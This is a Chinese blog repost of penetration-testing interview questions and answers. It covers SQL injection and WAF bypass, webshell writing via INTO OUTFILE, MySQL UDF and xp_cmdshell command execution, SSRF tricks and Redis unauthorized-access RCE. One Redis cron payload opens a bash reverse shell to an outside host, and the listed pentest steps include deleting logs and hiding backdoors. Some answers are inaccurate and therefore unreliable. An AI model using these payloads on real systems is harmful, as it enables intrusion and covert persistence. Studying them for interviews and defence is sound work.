2025年渗透测试面试题总结- 某亭-安全研究员(题目+回答)

news2025/3/22 17:34:23

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、SQL注入过滤单引号绕过方法

二、MySQL报错注入常用函数

三、报错注入绕WAF

四、MySQL写文件函数

五、MySQL提权方式

六、SQL Server其他渗透方式

七、SSRF原理与利用

八、内网IP过滤绕过

九、Redis漏洞利用

十、文件读取与路径获取

十一、反序列化漏洞

十二、渗透测试流程

十三、CMS指纹特征(以WordPress为例)

十四、正向代理与反向代理区别

十五、常见端口与服务

十六、弱密码绕过验证码

十七、非对称加密过程(RSA)


 

 

SQL注入过滤单引号怎么绕过
mysql报错注入常用函数
报错注入绕WAF
mysql写文件函数
into outfile使用有哪些限制
mysql提权
SQL server除了SQL注入以外还有哪些渗透方式
SSRF原理
SSRF可以利用的协议
哪些功能点会存在SSRF漏洞
对内网IP进行过滤,有什么绕过方式
redis rce过程
redis未授权怎么获得服务器权限
redis主从复制漏洞
任意文件读取一般读取哪些文件
如何通过文件读取获得web的绝对路径
/ect/passwd 文件包含哪些内容
java 反序列化漏洞
shiro反序列化漏洞
哪些组件或者中间件存在反序列化漏洞
渗透测试一个站点的具体流程
说一个熟悉的CMS,具有哪些指纹特征
正向代理和反向代理的区别
常见端口对应服务
常见的内置用户
弱密码存在验证码如何绕过
非对称加密的加密过程

一、SQL注入过滤单引号绕过方法

  1. 双写单引号' 转为 '',可能被过滤,但部分场景可尝试 ' OR 1=1--
  2. Hex编码:将字符串转为16进制,如 SELECT * FROM users WHERE username=0x61646D696E
  3. 宽字节注入:针对GBK编码数据库,利用%df%27触发编码错误(%df与反斜杠\结合生成繁体字符)。
  4. CHAR()函数:用CHAR(39)代替单引号(如SELECT CHAR(97,100,109,105,110)对应admin)。
  5. 字符串拼接:如CONCAT('a','dmin')拼接为admin

二、MySQL报错注入常用函数

  1. updatexml()sql
    AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    触发XPath语法错误,返回查询结果。
  2. extractvalue()
    sqlAND extractvalue(1,concat(0x7e,(SELECT database())))
    类似updatexml,利用XML解析报错。
  3. floor()+rand()
    sqlSELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))
    利用主键重复报错。
  4. exp()sql
    AND exp(~(SELECT * FROM(SELECT user())a))
    数值过大导致溢出报错。

三、报错注入绕WAF

  1. 分块传输:通过HTTP分块编码绕过正则检测。
  2. 注释干扰
    sql/*!50000updatexml*/(1,concat(0x7e,user()),1)
  3. 大小写混合:如UpDaTeXmL()
  4. 特殊符号分割
    sqlupdatexml(1,concat(0x7e,user()%23),1)
  5. 编码混淆:使用URL编码、Unicode编码(如%u0027代替单引号)。

四、MySQL写文件函数

  1. into outfile:写入多行数据,需绝对路径和权限。
    sqlSELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php' 
  2. dumpfile:写入二进制文件(如SSH密钥)。

限制

  • secure_file_priv需为空或目标目录。
  • Web目录需可写且路径正确。

五、MySQL提权方式

  1. UDF提权
    • 上传自定义动态库(如lib_mysqludf_sys.so )。
    • 创建函数执行系统命令:
      sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so' 
  2. 启动项提权
    sqlSELECT '恶意命令' INTO OUTFILE '/etc/rc.local' 
  3. CVE漏洞利用:如CVE-2016-6662(权限配置不当)。

六、SQL Server其他渗透方式

  1. xp_cmdshell:启用后执行系统命令。
    sqlEXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
  2. SSRS漏洞:利用Reporting Services的文件上传漏洞。
  3. 数据库链接攻击:通过OPENROWSET跨数据库查询。

七、SSRF原理与利用

  1. 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
  2. 协议利用
    • file://读取本地文件(如file:///etc/passwd)。
    • gopher://构造任意TCP流量(攻击Redis/MySQL)。
    • dict://探测端口信息。
  3. 高危功能点
    • 在线翻译、网页截图、URL预览、XML解析(XXE)等。

八、内网IP过滤绕过

  1. 进制转换127.0.0.1转为2130706433(十进制)或0177.0.0.1(八进制)。
  2. 域名重定向:使用短域名服务或xip.io (如127.0.0.1.xip.io )。
  3. CIDR绕过127.127.127.127/8

九、Redis漏洞利用

  1. 未授权访问RCE
    • 写入SSH密钥:
      redisconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
    • 定时任务提权:
      redisset x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save 
  2. 主从复制漏洞:加载恶意模块执行命令。

十、文件读取与路径获取

  1. 敏感文件
    • /etc/passwd:用户列表。
    • /proc/self/environ:环境变量(可能含路径)。
    • 日志文件(如/var/log/apache2/access.log )。
  2. 路径获取
    • 从PHP错误日志或phpinfo()中查找绝对路径。
    • 配置文件(如config.php 中的__DIR__)。

十一、反序列化漏洞

  1. Java反序列化:Apache Commons Collections的InvokerTransformer链触发RCE。
  2. Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
  3. 常见漏洞组件
    • WebLogic(CVE-2020-14882)。
    • Fastjson(自动类型推断导致的RCE)。

十二、渗透测试流程

  1. 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
  2. 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
  3. 漏洞利用:Metasploit框架、手工验证。
  4. 权限提升:Linux脏牛漏洞、Windows MS14-058。
  5. 痕迹清理:删除日志、隐藏后门。

十三、CMS指纹特征(以WordPress为例)

  1. 目录结构/wp-content/plugins//wp-admin/
  2. HTTP头X-Powered-By: WordPress
  3. 默认文件readme.htmlwp-login.php

十四、正向代理与反向代理区别

正向代理反向代理
代理客户端(隐藏客户端IP)代理服务端(隐藏服务器IP)
用于突破访问限制(如VPN)用于负载均衡(如Nginx)

十五、常见端口与服务

端口服务协议
22SSHTCP
80HTTPTCP
443HTTPSTCP
3306MySQLTCP
6379RedisTCP

十六、弱密码绕过验证码

  1. OCR识别:Tesseract识别简单验证码。
  2. 验证码复用:同一会话重复提交。
  3. Burp暴力破解:设置Intruder模块跳过验证码参数。

十七、非对称加密过程(RSA)

  1. 密钥生成:生成公钥(公开)和私钥(保密)。
  2. 加密:用公钥加密明文(如c = m^e mod n)。
  3. 解密:用私钥解密密文(如m = c^d mod n)。
  4. 应用场景:HTTPS握手、SSH登录。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2319696.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Redis分布式锁如何实现——简单理解版

目录 前言 满足条件 加锁之后产生的问题 避免死锁的方法 Lua脚本实现避免释放其他锁 看门狗判断过期 扩展 Lua脚本 Redission 前言 在如今开发的某些项目中&#xff0c;多个进程必须以互斥的方式独占共享资源&#xff0c;这时用分布式锁是最直接有效的&#xff0c;分布式…

数字化转型驱动卫生用品安全革新

当315晚会上晃动的暗访镜头揭露卫生巾生产车间里漂浮的异物、纸尿裤原料仓中霉变的碎屑时&#xff0c;这一触目惊心的场景无情地撕开了“贴身安全”的遮羞布&#xff0c;暴露的不仅是部分企业的道德缺失&#xff0c;更凸显了当前检测与监管体系的漏洞&#xff0c;为整个行业敲响…

自适应柔顺性策略:扩散引导控制中学习近似的柔顺

24年10月来自斯坦福大学和 TRI 的论文“Adaptive Compliance Policy: Learning Approximate Compliance for Diffusion Guided Control”。 柔顺性在操作中起着至关重要的作用&#xff0c;因为它可以在不确定的情况下平衡位置和力的并发控制。然而&#xff0c;当今的视觉运动策…

SVN简明教程——下载安装使用

SVN教程目录 一、开发中的实际问题二、简介2.1 版本控制2.2 Subversion2.3 Subversion的优良特性2.4 工作原理2.5 SVN基本操作 三、Subversion的安装与配置1. 服务器端程序版本2. 下载源码包3. 下载二进制安装包4. 安装5. 配置版本库① 为什么要配置版本库&#xff1f;② 创建目…

“智改数转”新风口,物联网如何重构制造业竞争力?

一、政策背景 为深化制造业智能化改造、数字化转型、网络化联接&#xff0c;江苏省制定了《江苏省深化制造业智能化改造数字化转型网络化联接三年行动计划&#xff08;2025&#xff0d;2027年&#xff09;》&#xff0c;提出到2027年&#xff0c;全省制造业企业设备更新、工艺…

从数据洪流到智能洞察:人工智能如何解锁大数据的价值?

引言&#xff1a;数据洪流时代&#xff0c;企业的机遇与挑战 在这个信息爆炸的时代&#xff0c;数据正以前所未有的速度增长。IDC预测&#xff0c;全球数据量将在未来几年内持续飙升&#xff0c;企业每天都会产生海量的用户行为数据、市场交易数据、设备传感数据等。理论上&…

蓝桥杯 之 数论

文章目录 习题质数找素数 LCM报数游戏 快速幂数字诗意 组合数与错位排序小蓝与钥匙 同余取模 数论&#xff0c;就是一些数学问题&#xff0c;蓝桥杯十分喜欢考察&#xff0c;常见的数论的问题有&#xff1a;取模&#xff0c;同余&#xff0c;大整数分解&#xff0c;素数&#x…

SpringBoot的启动原理?

大家好&#xff0c;我是锋哥。今天分享关于【SpringBoot的启动原理&#xff1f;】面试题。希望对大家有帮助&#xff1b; SpringBoot的启动原理&#xff1f; 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 Spring Boot的启动原理主要是通过 SpringApplication 类来…

从零开始搭建向量数据库:基于 Xinference 和 Milvus 的文本搜索实践

引言 在 AI 和大数据时代&#xff0c;向量数据库正成为处理非结构化数据&#xff08;如文本、图像&#xff09;的利器。最近&#xff0c;我尝试用 Xinference 和 Milvus 搭建一个简单的文本搜索系统&#xff0c;从读取本地文本文件到实现交互式查询和高亮显示匹配结果&#xf…

scrapy入门(深入)

Scrapy框架简介 Scrapy是:由Python语言开发的一个快速、高层次的屏幕抓取和web抓取框架&#xff0c;用于抓取web站点并从页面中提取结构化的数据&#xff0c;只需要实现少量的代码&#xff0c;就能够快速的抓取。 新建项目 (scrapy startproject xxx)&#xff1a;新建一个新的…

docker模拟Dos_SYN Flood拒绝服务攻击 (Ubuntu20.04)

目录 ✅ 一、实验环境准备&#xff08;3 个终端&#xff09; &#x1f449; 所以最终推荐做法&#xff1a; 2️⃣ 配置 seed-attacker 为攻击者&#xff0c;开启 telnet 服务&#xff1a; 3️⃣ 配置 victim-10.9.0.5 为受害者服务器&#xff0c;开启 telnet 客户端并监听&…

基于PySide6的CATIA自动化工具开发实战——空几何体批量清理系统

一、功能概述 本工具通过PySide6构建用户界面&#xff0c;结合PyCATIA库实现CATIA V5的自动化操作&#xff0c;提供两大核心功能&#xff1a; ​空几何体清理&#xff1a;智能识别并删除零件文档中的无内容几何体&#xff08;Bodies&#xff09;​空几何图形集清理&#xff1…

Spring 声明式事务应该怎么学?

1、引言 Spring 的声明式事务极大地方便了日常的事务相关代码编写&#xff0c;它的设计如此巧妙&#xff0c;以至于在使用中几乎感觉不到它的存在&#xff0c;只需要优雅地加一个 Transactional 注解&#xff0c;一切就都顺理成章地完成了&#xff01; 毫不夸张地讲&#xff…

从 0 到 1 掌握鸿蒙 AudioRenderer 音频渲染:我的自学笔记与踩坑实录(API 14)

最近我在研究 HarmonyOS 音频开发。在音视频领域&#xff0c;鸿蒙的 AudioKit 框架提供了 AVPlayer 和 AudioRenderer 两种方案。AVPlayer 适合快速实现播放功能&#xff0c;而 AudioRenderer 允许更底层的音频处理&#xff0c;适合定制化需求。本文将以一个开发者的自学视角&a…

支持多系统多协议且可提速的下载工具

在网络下载需求日益多样的当下&#xff0c;一款好用的下载器能极大提升效率。今天就给大家介绍 AB Download Manager&#xff0c;它免费又开源&#xff0c;能适配 Windows 和 Linux 系统&#xff0c;带来超便捷的下载体验。 AB Download Manager 采用先进的多线程技术&#xf…

如何在 HTML 中创建一个有序列表和无序列表,它们的语义有何不同?

大白话如何在 HTML 中创建一个有序列表和无序列表&#xff0c;它们的语义有何不同&#xff1f; 1. HTML 中有序列表和无序列表的基本概念 在 HTML 里&#xff0c;列表是一种用来组织信息的方式。有序列表就是带有编号的列表&#xff0c;它可以让内容按照一定的顺序呈现&#…

【武汉·4月11日】Parasoft联合光庭信息研讨会|邀您共探AI赋能新机遇

Parasoft联合光庭信息Workshop邀您共探AI赋能新机遇 AI浪潮已至&#xff0c;你准备好了吗&#xff1f; 在智能网联汽车飞速发展的今天&#xff0c;AI技术正以前所未有的速度重塑行业生态。如何把握AI机遇&#xff0c;赋能企业创新&#xff1f; 4月11日&#xff0c;自动化软件…

闻所闻尽:穿透声音的寂静,照见生命的本真

在《楞严经》的梵音缭绕中&#xff0c;"闻所闻尽"四个字如晨钟暮鼓&#xff0c;叩击着每个修行者的心门。这个源自观世音菩萨耳根圆通法门的核心概念&#xff0c;既是佛门修行的次第指引&#xff0c;更蕴含着东方哲学对生命本质的终极叩问。当我们穿越时空的帷幕&…

VLAN综合实验报告

一、实验拓扑 网络拓扑结构包括三台交换机&#xff08;LSW1、LSW2、LSW3&#xff09;、一台路由器&#xff08;AR1&#xff09;以及六台PC&#xff08;PC1-PC6&#xff09;。交换机之间通过Trunk链路相连&#xff0c;交换机与PC、路由器通过Access或Hybrid链路连接。 二、实验…

Midjourney使用教程—2.作品修改

当您已生成第一张Midjourney图像的时候&#xff0c;接下来该做什么&#xff1f;了解我们用于修改图像的工具&#xff01;使用 Midjourney 制作图像后&#xff0c;您的创意之旅就不会止步于此。您可以使用各种工具来修改和增强图像。 一、放大操作 Midjourney每次会根据提示词…